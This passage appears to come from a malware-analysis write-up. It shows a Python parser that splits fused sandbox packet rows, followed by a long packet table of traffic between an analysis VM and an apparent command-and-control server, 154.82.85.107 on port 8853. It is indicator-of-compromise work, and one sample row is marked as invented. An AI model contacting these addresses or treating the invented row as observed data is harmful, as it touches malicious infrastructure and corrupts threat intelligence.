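# report's TCP packet table; the fourth is invented here (it is not on the page)
# to show a second C2 port being summarised.
SAMPLE_ROWS = [
    "Jan 8, 2025 07:14:56.797892094 CET497308853192.168.2.4154.82.85.107",
    "Jan 8, 2025 07:14:56.803703070 CET885349730154.82.85.107192.168.2.4",
    "Jan 8, 2025 07:14:56.803776979 CET497308853192.168.2.4154.82.85.107",
    "Jan 8, 2025 07:15:33.000000000 CET4974015091192.168.2.4154.82.85.107",
]
SANDBOX_IP = "192.168.2.4"  # the analysis VM's address in this report


@dataclass(frozen=True)
class Packet:
    ts: str
    sport: int
    dport: int
    src: str
    dst: str


def _port_ok(s: str) -> bool:
    return 1 <= len(s) <= 5 and s.isdigit() and s[0] != "0" and int(s) <= 65535


def _octet_ok(s: str) -> bool:
    return 1 <= len(s) <= 3 and s.isdigit() and (len(s) == 1 or s[0] != "0") and int(s) <= 255


def candidates(ts: str, body: str) -> list[Packet]:
    """Every split of the fused field string that satisfies the format constraints."""
    groups = body.split(".")
    if len(groups) != 7:  # two fused dotted quads share one group: 4 + 4 - 1
        return []
    head, s2, s3, mid, d2, d3, d4 = groups
    if not all(_octet_ok(g) for g in (s2, s3, d2, d3, d4)):
        return []
    found = []
    # head = source port + destination port + first octet of the source address
    for i in range(1, min(5, len(head)) + 1):
        for j in range(i + 1, min(i + 5, len(head)) + 1):
            sport, dport, s1 = head[:i], head[i:j], head[j:]
            if not (_port_ok(sport) and _port_ok(dport) and _octet_ok(s1)):
                continue
            # mid = last octet of the source address + first octet of the destination
            for k in range(1, len(mid)):
                s4, d1 = mid[:k], mid[k:]
                if _octet_ok(s4) and _octet_ok(d1):
                    found.append(Packet(ts, int(sport), int(dport),
                                        f"{s1}.{s2}.{s3}.{s4}", f"{d1}.{d2}.{d3}.{d4}"))
    return found


def parse_row(row: str, local_ip: str) -> Packet:
    """Parse one fused row; the sandbox VM address must be exactly one endpoint."""
    m = ROW_RE.match(row.strip())
    if not m:
        raise ValueError(f"unrecognised row: {row!r}")
    hits = [p for p in candidates(m["ts"], m["body"])
            if (p.src == local_ip) != (p.dst == local_ip)]
    if len(hits) != 1:
        raise ValueError(f"{len(hits)} valid splits for {row!r}; refusing to guess")
    return hits[0]


def summarise(rows: list[str], local_ip: str) -> dict[str, dict]:
    """Per remote host: packets out of and into the sandbox, and the remote ports touched."""
    stats: dict[str, dict] = defaultdict(lambda: {"out": 0, "in": 0, "remote_ports": set()})
    for row in rows:
        p = parse_row(row, local_ip)
        if p.src == local_ip:
            stats[p.dst]["out"] += 1
            stats[p.dst]["remote_ports"].add(p.dport)
        else:
            stats[p.src]["in"] += 1
            stats[p.src]["remote_ports"].add(p.sport)
    return {ip: {**s, "remote_ports": sorted(s["remote_ports"])} for ip, s in stats.items()}


if __name__ == "__main__":
    for ip, s in summarise(SAMPLE_ROWS, SANDBOX_IP).items():
        print(ip, s)
```

Run on the sample rows this reports 154.82.85.107 with three packets out, one in, and remote ports 8853 and 15091. The refusal to guess when zero or several splits survive the local-endpoint filter is deliberate: an IOC list built from a misparsed row is worse than a row flagged for manual review.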
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 8, 2025 07:14:56.797892094 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:56.803703070 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:56.803776979 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:57.619026899 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.619049072 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.619062901 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.619076014 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.619087934 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.619098902 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.619102955 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:57.619112015 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.619126081 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.619127035 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:57.619137049 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.619153023 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.619179010 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:57.619193077 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:57.623941898 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.624001980 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.624016047 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.624042988 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.624047041 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:57.624100924 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:57.846117973 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.846142054 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.846153975 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.846168041 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.846187115 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.846199989 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.846332073 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.846399069 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:57.846399069 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:57.846695900 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.846718073 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.846749067 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:57.846812963 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.846826077 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.846873999 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:57.846927881 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.846940994 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.847004890 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:57.847527027 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.847548008 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.847560883 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.847601891 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:57.847601891 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:57.847759008 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.847771883 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.847783089 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.847836971 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:57.848464966 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.848506927 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:57.848522902 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.848536015 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.848552942 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.848563910 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:57.848586082 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:57.848618984 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.072171926 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.072190046 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.072213888 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.072226048 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.072237968 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.072340965 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.072350025 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.072350025 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.072402954 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.072424889 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.072437048 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.072484970 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.072503090 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.072741032 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.072760105 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.072771072 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.072796106 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.072813988 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.072837114 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.073141098 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.073160887 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.073232889 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.073250055 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.073261976 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.073302031 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.073422909 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.073434114 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.073445082 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.073456049 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.073494911 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.073494911 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.074091911 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.074151039 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.074157953 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.074162960 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.074233055 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.074264050 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.074276924 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.074287891 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.074373007 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.074400902 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.074413061 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.074460030 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.075026989 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.075047970 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.075057983 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.075109959 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.075109959 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.075164080 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.075254917 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.075265884 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.075274944 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.075285912 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.075330973 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.075341940 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.075978994 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.075990915 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.076035976 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.298491955 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.298517942 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.298531055 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.298578024 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.298592091 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.298603058 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.298610926 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.298616886 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.298639059 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.298666000 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.298715115 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.298763037 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.298789978 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.298810959 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.298899889 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.298912048 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.298957109 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.298975945 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.299210072 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.299221039 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.299232960 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.299267054 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.299299002 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.299316883 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.299329996 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.299343109 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.299375057 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.299375057 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.299794912 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.299807072 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.299817085 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.299854994 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.299854994 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.299947023 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.299958944 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.299969912 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.299983978 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:14:58.300010920 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.300026894 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.301326036 CET | 49730 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:14:58.306143999 CET | 8853 | 49730 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:15:03.039799929 CET | 49731 | 8853 | 192.168.2.4 | 154.82.85.107
Jan 8, 2025 07:15:03.044747114 CET | 8853 | 49731 | 154.82.85.107 | 192.168.2.4
Jan 8, 2025 07:15:03.044816017 CET | 49731 | 8853 | 192.168.2.4 | 154.82.85.107
                                                                                  Jan 8, 2025 07:15:03.342003107 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:03.342034101 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:03.342129946 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:03.353368998 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:03.353382111 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:03.852495909 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:03.852514029 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:03.852536917 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:03.852549076 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:03.852560997 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:03.852566957 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:03.852605104 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:03.852689028 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:03.852700949 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:03.852711916 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:03.852724075 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:03.852736950 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:03.852736950 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:03.852766991 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:03.852803946 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:03.857398033 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:03.857420921 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:03.857568026 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.078187943 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.078223944 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.078233957 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.078263998 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.078278065 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.078284979 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.078330994 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.078412056 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.078428030 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.078474045 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.079073906 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.079119921 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.079132080 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.079133987 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.079169989 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.079267979 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.079278946 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.079332113 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.080012083 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.080024004 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.080034971 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.080075026 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.080132008 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.080203056 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.080502987 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.080557108 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.080569029 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.080616951 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.080662966 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.080673933 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.080786943 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.081418991 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.081468105 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.083170891 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.124387026 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.310664892 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.310695887 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.310708046 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.310743093 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.310833931 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.310846090 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.310857058 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.310869932 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.310894012 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.310924053 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.311156988 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.311168909 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.311180115 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.311214924 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.311245918 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.311258078 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.311269045 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.311280012 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.311292887 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.311321020 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.311343908 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.311954021 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.311974049 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.311985970 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.312031031 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.312112093 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.312170982 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.312185049 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.312196970 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.312207937 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.312228918 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.312903881 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.312915087 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.312926054 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.312951088 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.312988043 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.313060045 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.313071966 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.313082933 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.313093901 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.313113928 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.313139915 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.313780069 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.313796043 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.313807964 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.313837051 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.313839912 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.313848019 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.313858986 CET885349731154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:04.313893080 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.313909054 CET497318853192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:04.396918058 CET885349731154.82.85.107192.168.2.4
